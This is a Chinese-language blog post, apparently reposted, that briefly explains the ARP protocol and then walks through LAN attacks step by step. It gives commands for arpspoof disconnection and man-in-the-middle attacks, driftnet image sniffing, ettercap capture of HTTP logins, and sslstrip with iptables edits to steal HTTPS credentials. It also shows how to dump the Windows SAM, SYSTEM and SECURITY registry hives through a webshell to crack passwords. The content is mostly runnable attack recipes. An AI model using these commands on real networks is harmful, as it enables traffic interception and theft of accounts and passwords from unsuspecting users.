ARP基础

ARP协议

ARP协议是”Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络实际传送的是“帧”,帧里面是有目标机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址,但这个目标MAC地址是如何获得的呢?他就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的工程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。


  1. 查看局域网中的主机

fping -aqg 192.168.100.0/24
-g generate target list
-a show targets that are alive
-q quiet (don’t show per-target/per-ping results)
nmap -sP 192.168.100.0/24
“ -Sp ” 选项告诉Nmap仅仅进行ping扫描。
  • 断网
    arpspoof -i eth0 -t 192.168.100.15 192.168.1.1(arpspoof -i 网卡 -t 目标IP 网关)
  • 流量劫持
    echo 1 >/proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.100.15 192.168.1.1
  • 图片嗅探
    - echo 1 > /proc/sys/net/ipv4/ip_forward
    //开启或关闭IP转发
    - cat /proc/sys/net/ipv4/ip_forward
    //查看状态
    arpspoof -i eth0 -t 10.0.0.102 10.0.0.1
    //向被攻击机器发送arp欺骗数据包,冒充网关-i参数指定arp劫持使用的网卡有线网卡eth0,无线网卡wlan0如果机器上有多个网卡那就依次eth1wlan1,往后排,-t参数指定arp数据包目的地,最后的主机表示本机要仿冒的IP地址,这条命令的作用是向10.0.0.102发送本机仿冒10.0.0.1的数据包,102会把本机当作网关,它本来发往10.0.0.1的数据现在发往本机10.0.0.103
    - arpspoof -i eth0 -t 10.0.0.1 10.0.0.102
    //向网关发送arp数据欺骗网关,冒充被攻击机器向真正的网关发送arp数据,告诉网关,本机就是10.0.0.102,代替真正的10.0.0.102接收数据,配合第一步的ip_forward,在结合上边两步的命令就可以成功的在网关和被攻击机器之间建立一个中转,也就是中间人,被攻击机器发出的数据被本机监听后发往网关,网关返回被攻击机器的数据也被本机监听并转发给被攻击机器。
    - driftnet -i eth0
    //运行driftnet截取图片监听WLAN0网卡的数据流量,然后可以执行三条命令了,嗅探到的图片保存在home目录下
  • http登录账号密码嗅探
    echo 1 >/proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.100.15 192.168.100.1
    ettercap -Tq -i eth0
    -T文本模式启动 -q安静模式
  • 导出系统注册表抓Hash的思路

    首先使用 administrator权限登录,然后使用 reg来保存注册表中 HKLM下的SECURITY,SAM,SYSTEM,在我们通过菜刀连接目标机之后,在虚拟终端中,可以使用reg命令,将以上三个文件导入出来,然后再使用菜刀下载到本地,以此来破解目标机密码。
    - reg save hklm\sam sam.hive
    - reg save hklm\system system.hive
    - reg save hklm\security security.hive

    参考网文

    HTTP账号密码获取

    kali系统命令:
    1. arpspoof -i 网卡 -t 目标IP 网关 #断网攻击
    1. HTTP账号密码获取:
    命令:echo 1 > /proc/sys/net/ipv4/ip_forward # 写入 1 表示开启转发功能!
    1. 用cat查看修改:
    命令:cat /proc/sys/net/ipv4/ip_forward # 显示1表示成功开启转发功能,0表示未开启
    1. 命令:arpspoof -i 网卡 -t 目标IP 网关 #开启欺骗
    1. 用ettercap抓取登入帐号,密码:命令:ettercap -Tq -i 网关 # T表示文本模式,q表示安静模式

    HTTPS账号密码获取:

    1. 先编辑下/etc/ettercap/etter.conf
      命令:vim /etc/ettercap/etter.conf
    2. 找到
      • if you use iptables:
      • #redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp-dport %port -j REDIRECT –to-port %rport”
      • #redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp-dport %port -j REDIRECT –to-port %rport”
    3. 改为(去掉两个#):
      if you use iptables:
      • redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
      • redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
    4. 进入vim状态:按下i,进入编辑按下Esc,Shift+:,q!(不保存,退出)或 wq(保存,退出)
    5. 然后运行sslstrip -a -f -k 实现https转换成http以获取帐号密码
      再用HTTP账号密码获取方法就可。
      参考网文

    ettercap局域网内DNS欺骗

    ettercap是什么?

    ettercap是在linux下运行的嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。
    后记:ettercap了解不太多,现在精力放在web渗透上了…………

    猜你喜欢

    转载自blog.csdn.net/u011215939/article/details/79037133
    arp